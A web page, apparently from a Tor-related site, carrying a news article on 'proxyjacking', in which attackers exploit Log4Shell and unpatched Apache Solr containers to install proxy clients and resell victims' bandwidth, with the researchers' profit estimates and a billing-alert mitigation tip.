BTC $51524.6928
ETH $3102.2833
BNB $384.2776
SOL $103.2311
XRP $0.5405
ADA $0.5849
AVAX $36.9511
TRX $0.1377
DOGE $0.0856
wstETH $3587.3896
LINK $18.6494
DOT $7.8438
WETH $3100.0078
UNI $11.0945
MATIC $0.9971
WBTC $51554.8458
IMX $3.3401
ICP $12.4013
LTC $70.0025
BCH $266.3236
CAKE $3.1426
FIL $8.1456
ETC $27.0947
RNDR $7.2587
DAI $1.0009
KAS $0.1676
HBAR $0.1071
ATOM $10.3461
INJ $35.4309
VET $0.0467
TON $2.0697
OKB $50.3127
FDUSD $0.9994
LDO $3.3633
GRT $0.3004
ARB $1.8920
XMR $128.8577
TIA $16.5811
XLM $0.1156
STX $2.5143
ENS $22.4126
NEAR $3.6605
APEX $2.4601
WEMIX $2.0774
MKR $2060.5410
BEAM $0.0332
MNT $0.8950
BTC $51524.6928
ETH $3102.2833
BNB $384.2776
SOL $103.2311
XRP $0.5405
ADA $0.5849
AVAX $36.9511
TRX $0.1377
DOGE $0.0856
wstETH $3587.3896
LINK $18.6494
DOT $7.8438
WETH $3100.0078
UNI $11.0945
MATIC $0.9971
WBTC $51554.8458
IMX $3.3401
ICP $12.4013
LTC $70.0025
BCH $266.3236
CAKE $3.1426
FIL $8.1456
ETC $27.0947
RNDR $7.2587
DAI $1.0009
KAS $0.1676
HBAR $0.1071
ATOM $10.3461
INJ $35.4309
VET $0.0467
TON $2.0697
OKB $50.3127
FDUSD $0.9994
LDO $3.3633
GRT $0.3004
ARB $1.8920
XMR $128.8577
TIA $16.5811
XLM $0.1156
STX $2.5143
ENS $22.4126
NEAR $3.6605
APEX $2.4601
WEMIX $2.0774
MKR $2060.5410
BEAM $0.0332
MNT $0.8950
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Proxyjacking has become a profitable business for cybercriminals

    The Sysdig Threat Research Team has discovered a new attack vector based on the interception of legitimate proxy services that allow people to sell part of their bandwidth to third parties.

    Sysdig researchers said that a new attack vector called "proxyjacking" allows cybercriminals to earn hundreds of thousands of dollars a month in the form of passive income.

    According to Kaspersky Lab, proxy services work like this: The user installs a client that creates a proxy server. The client makes the Internet connection of the device available to an external party - a proxy service, which then resells part of the user's bandwidth to other people.

    Proxy technology has found use among users who use someone else's IP address to bypass geoblocks or view dubious websites without being tied to their own IP address. Usually, people pay per IP address based on the number of hours the application is running.

    In one of the attacks observed by Sysdig researchers, attackers compromised a container in the cloud using a Log4j vulnerability (Log4Shell) and then installed a proxy client that turned the system into a proxy server without the knowledge of the container owner. The attacker then sold the IP address of the compromised device to a proxy service.

    Typically, Log4j attacks involve a hacker downloading a backdoor or cryptojacking payload onto a device. Crystal Morin, threat research engineer at Sysdig, said that proxyjacking is similar to cryptojacking in that they both benefit from the victim's bandwidth - and both are about equally beneficial to the attacker. However, the two attacks differ in that the miner uses CPU resources, while proxyjacking uses network resources, with minimal CPU load.

    Morin noted that the impact of proxyjacking on the system is negligible: 1 GB of network traffic distributed over the course of a month amounts to tens of megabytes per day - it is very likely that the attack will go unnoticed.

    In the discovered attack, hackers compromised an unpatched Apache Solr service running on a Kubernetes infrastructure in order to take control of a container in the environment. Then the cybercriminals downloaded a malicious script from the C2 server, which they placed in the "/tmp" folder in order to be able to use the compromised module to make money.

    The researchers noticed that the attackers tried to cover up traces of malicious activity by clearing the history and deleting the downloaded binary file, as well as temporary files.

    Researchers estimate that for 24 hours of work from a single hacked IP address, an attacker can earn $9.60 per month. Experts noted that if 100 IP addresses are compromised, a cybercriminal can earn passive income of almost $1,000 per month.

    When using Log4j on unpatched systems, this figure could be even higher, as millions of servers are still running vulnerable versions of the logging tool, and according to Censys, more than 23,000 of them are available online. “Theoretically, the Log4j vulnerability alone could bring an attacker more than $220,000 in profit per month,” Morin said.

    To avoid huge bills for using proxies, organizations should set billing limits and verification tool alerts, the researchers say.

    Author DeepWeb
    ARES group lures former BreachForums users to their own sites
    Hundred Finance Loses $7M in DeFi Protocol Hack

    Comments 0

    Add comment